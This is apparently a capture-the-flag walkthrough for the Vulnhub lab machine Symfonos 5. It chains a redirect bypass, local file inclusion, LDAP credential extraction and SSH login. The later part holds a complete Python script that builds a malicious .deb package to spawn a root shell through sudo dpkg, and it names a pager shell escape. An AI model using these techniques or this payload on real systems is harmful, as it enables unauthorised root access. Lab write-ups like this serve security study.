Today we are going to pwn Symfonos 5 by Zayotic from Vulnhub.
The author describes it as a beginner, real-life-based machine designed to teach people the importance of understanding things from the inside.
Download Link : https://www.vulnhub.com/entry/symfonos-52,415/
Let's begin with our initial scan.
Nmap Scan Results:
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 16:70:13:77:22:f9:68:78:40:0d:21:76:c1:50:54:23 (RSA)
|   256 a8:06:23:d0:93:18:7d:7a:6b:05:77:8d:8b:c9:ec:02 (ECDSA)
|_  256 52:c0:83:18:f4:c7:38:65:5a:ce:97:66:f3:75:68:4c (ED25519)
80/tcp  open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X
636/tcp open  ldapssl?
The web page is the usual static page with an image.
I started Gobuster to find any useful directories.
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.101
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html
[+] Timeout:        10s
===============================================================
2020/03/12 22:11:24 Starting gobuster
===============================================================
/index.html (Status: 200)
/static (Status: 301)
/home.php (Status: 302)
/admin.php (Status: 200)
/logout.php (Status: 302)
/portraits.php (Status: 200)
/server-status (Status: 403)
===============================================================
2020/03/12 22:13:28 Finished
===============================================================
When I visit /home.php it redirects to /admin.php. Let's capture the request in Burp.
The response is a 302 Found, i.e. a redirect, and we can stop the browser from following it with Burp.
All we need to do is rewrite the status line from 302 Found to 200 OK. For that, open Proxy -> Options -> Match and Replace and add a rule on response headers.
This only works because the script keeps rendering the protected page after it sends the Location header (the classic PHP header('Location: ...') with no exit after it, an Execution After Redirect bug): the body of the "redirect" response already contains the whole page, and changing the status code simply makes the browser display it instead of following the redirect.
Now we can visit
Looking at how those tabs load their content, this looks like a Local File Inclusion.
I checked it in Burp, and yes, it is an LFI.
I used the LFI to read admin.php. (If the inclusion is a plain PHP include(), requesting a .php file executes it instead of showing it; a php://filter/convert.base64-encode/resource=admin.php wrapper returns the source base64-encoded in that case.)
The file contains what looks like a password for LDAP: qMDdyZh3cT6eeAWD
Since we now have a password we can query the directory with the ldapsearch tool. The relevant options from its man page:
-b searchbase   Use searchbase as the starting point for the search instead of the default.
-x              Use simple authentication instead of SASL.
-D binddn       Use the Distinguished Name binddn to bind to the LDAP directory. For SASL binds, the server is expected to ignore this value.
-w passwd       Use passwd as the password for simple authentication.
The search returns the user zeus together with a password, which ldapsearch prints base64-encoded: LDIF writes any attribute value it does not consider safe plain text (userPassword is one of them) as attr:: <base64>. Note that this is encoding, not hashing; a hashed OpenLDAP password would decode to something starting with a scheme such as {SSHA}. Here it decodes to a clear-text password:
zeus : cetkKf4wCuHC9FET
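The decoding step, as an added example (this is not code from the writeup): a small LDIF reader that handles the three things that make ldapsearch output easy to misread, the `attr:: base64` form, folded continuation lines, and the difference between a clear-text userPassword and an {SCHEME}-prefixed hash. The sample LDIF below is constructed; the DNs, the ldapsearch command in the comment and the extra attributes are assumptions, only the bind password and the decoded zeus password come from the box.

```python
import base64

# Constructed sample of the LDIF (RFC 2849) that ldapsearch prints.
# Assumed command that would produce it (placeholder DNs, not the box's):
#   ldapsearch -x -h 192.168.1.101 -b "dc=example,dc=local" \
#       -D "cn=admin,dc=example,dc=local" -w qMDdyZh3cT6eeAWD
SAMPLE_LDIF = """\
dn: uid=zeus,dc=example,dc=local
objectClass: inetOrgPerson
uid: zeus
cn: zeus
description: this line is folded
  over two physical lines
userPassword:: Y2V0a0tmNHdDdUhDOUZFVA==
"""


def unfold(text):
    """Join LDIF continuation lines: a leading space means 'same value'."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_ldif(text):
    """Parse LDIF into a list of entries, each a dict attr -> [values].

    'attr: value'  is a plain string value.
    'attr:: value' is base64; LDIF uses it for anything that is not a
                   SAFE-STRING, which is why userPassword shows up encoded
                   (encoded, not hashed).
    'attr:< url'   references an external value; kept as the URL string.
    """
    entries, current = [], None
    for line in unfold(text):
        if not line.strip() or line.startswith("#"):
            continue
        if line.startswith("dn:"):          # every entry starts with its DN
            current = {}
            entries.append(current)
        attr, sep, value = line.partition(":")
        if not sep or current is None:
            raise ValueError("malformed LDIF line: %r" % line)
        if value.startswith(":"):
            decoded = base64.b64decode(value[1:].strip())
            try:
                value = decoded.decode("utf-8")
            except UnicodeDecodeError:
                value = decoded                 # genuinely binary: keep bytes
        elif value.startswith("<"):
            value = value[1:].strip()
        else:
            value = value.lstrip(" ")
        current.setdefault(attr, []).append(value)
    return entries


def credentials(entries):
    """Return (uid, password) pairs for entries whose userPassword is clear text.

    OpenLDAP stores hashed passwords as '{SSHA}...', '{CRYPT}...' etc., so a
    decoded value that starts with '{' is a hash and is deliberately skipped.
    """
    creds = []
    for entry in entries:
        for pw in entry.get("userPassword", []):
            if isinstance(pw, str) and not pw.startswith("{"):
                creds.append((entry["uid"][0], pw))
    return creds


if __name__ == "__main__":
    for uid, pw in credentials(parse_ldif(SAMPLE_LDIF)):
        print(uid + " : " + pw)
```

Run against real ldapsearch output (`ldapsearch ... > dump.ldif`, then `parse_ldif(open("dump.ldif").read())`) it lists every account whose password the directory keeps in the clear, which is the finding that matters here: the box does not hash userPassword at all.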
I tried logging in over SSH with these credentials.
Like always I started with
We can run dpkg as root without a password.
I searched for dpkg on GTFOBins.
The machine doesn't have fpm, so I built the payload package on my own machine and uploaded it to the target.
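Building that package by hand, as an added example (not the author's payload): a .deb is just an ar archive with three members (debian-binary, control.tar.gz, data.tar.gz), and Python's standard library is enough to assemble one, so neither fpm nor dpkg-deb is needed on the attack box either. The package name, version and the postinst contents are assumptions; GTFOBins' dpkg entry uses an install script that runs /bin/sh, which is what PAYLOAD reproduces.

```python
import io
import tarfile
import time

# Assumed package metadata and payload (not from the writeup).
PKG_NAME = "x"
PKG_VERSION = "1.0"
PAYLOAD = "#!/bin/sh\n/bin/sh\n"   # runs as root during `sudo dpkg -i`


def _ar_member(name, data):
    """One member of an 'ar' archive, the container format of a .deb."""
    header = (
        name.ljust(16)                  # file name, space padded
        + str(int(time.time())).ljust(12)
        + "0".ljust(6)                  # uid
        + "0".ljust(6)                  # gid
        + "100644".ljust(8)             # mode, octal
        + str(len(data)).ljust(10)      # size in bytes
        + "`\n"                         # header terminator
    ).encode("ascii")
    assert len(header) == 60
    pad = b"\n" if len(data) % 2 else b""   # members are 2-byte aligned
    return header + data + pad


def _targz(files):
    """Build a gzip'd tar in memory from {path: (mode, bytes or None for dir)}."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, (mode, content) in files.items():
            info = tarfile.TarInfo(path)
            info.mode = mode
            info.mtime = int(time.time())
            if content is None:
                info.type = tarfile.DIRTYPE
                tar.addfile(info)
            else:
                info.size = len(content)
                tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def build_deb(name=PKG_NAME, version=PKG_VERSION, postinst=PAYLOAD):
    """Return the bytes of a .deb whose postinst script is `postinst`."""
    control = (
        "Package: %s\nVersion: %s\nArchitecture: all\n"
        "Maintainer: nobody\nDescription: dpkg sudo test package\n" % (name, version)
    ).encode()
    control_tgz = _targz({
        "./": (0o755, None),
        "./control": (0o644, control),
        "./postinst": (0o755, postinst.encode()),   # must be executable
    })
    data_tgz = _targz({"./": (0o755, None)})         # no payload files needed
    return (b"!<arch>\n"
            + _ar_member("debian-binary", b"2.0\n")
            + _ar_member("control.tar.gz", control_tgz)
            + _ar_member("data.tar.gz", data_tgz))


def ar_members(deb):
    """Parse the ar container back into {name: bytes} (sanity check / reader)."""
    assert deb[:8] == b"!<arch>\n", "not an ar archive"
    pos, members = 8, {}
    while pos < len(deb):
        hdr = deb[pos:pos + 60]
        name = hdr[:16].decode().strip()
        size = int(hdr[48:58].decode().strip())
        members[name] = deb[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)
    return members


def postinst_of(deb):
    """Extract the postinst script text from a .deb built by build_deb."""
    control = ar_members(deb)["control.tar.gz"]
    with tarfile.open(fileobj=io.BytesIO(control), mode="r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile() and member.name.endswith("postinst"):
                return tar.extractfile(member).read().decode()
    raise KeyError("postinst")


if __name__ == "__main__":
    out = "%s_%s_all.deb" % (PKG_NAME, PKG_VERSION)
    with open(out, "wb") as f:
        f.write(build_deb())
    print("wrote", out)
```

Copy the resulting x_1.0_all.deb to the target and run `sudo dpkg -i x_1.0_all.deb`; dpkg executes postinst as root with no signature check of its own, so the script's shell is a root shell. GTFOBins also lists a no-package route for the same sudo rule: `sudo dpkg -l` shows its output in a pager, and `!/bin/sh` typed inside the pager spawns a root shell.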